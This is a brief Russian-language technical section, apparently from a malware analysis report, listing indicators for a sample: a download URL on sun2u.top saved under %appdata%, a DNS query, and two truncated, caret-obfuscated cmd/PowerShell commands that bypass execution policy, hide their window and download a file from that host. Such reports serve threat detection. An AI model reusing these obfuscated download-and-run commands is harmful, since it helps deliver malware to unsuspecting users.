Техническая информация
- http://sun2u.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Pow^e^rshE^L^l.^ExE^ -EXeCu^tIOn^poliC^y ^B^Ypass -^n^o^PRo^f^ilE ^-W^I^n^DOW^StYl^E H^I^Dd^En ^(NE^W-obJe^CT Sy^STem.^NEt.webCLIENt).DOWN^l^OaD^fiL^E^('http://sun2u.top/searc...
- DNS ASK su##u.top
- '<SYSTEM32>\cmd.exe' /C "Pow^e^rshE^L^l.^ExE^ -EXeCu^tIOn^poliC^y ^B^Ypass -^n^o^PRo^f^ilE ^-W^I^n^DOW^StYl^E H^I^Dd^En ^(NE^W-obJe^CT Sy^STem.^NEt.webCLIENt).DOWN^l^OaD^fiL^E^('http://sun2u.top/searc...' (со скрытым окном)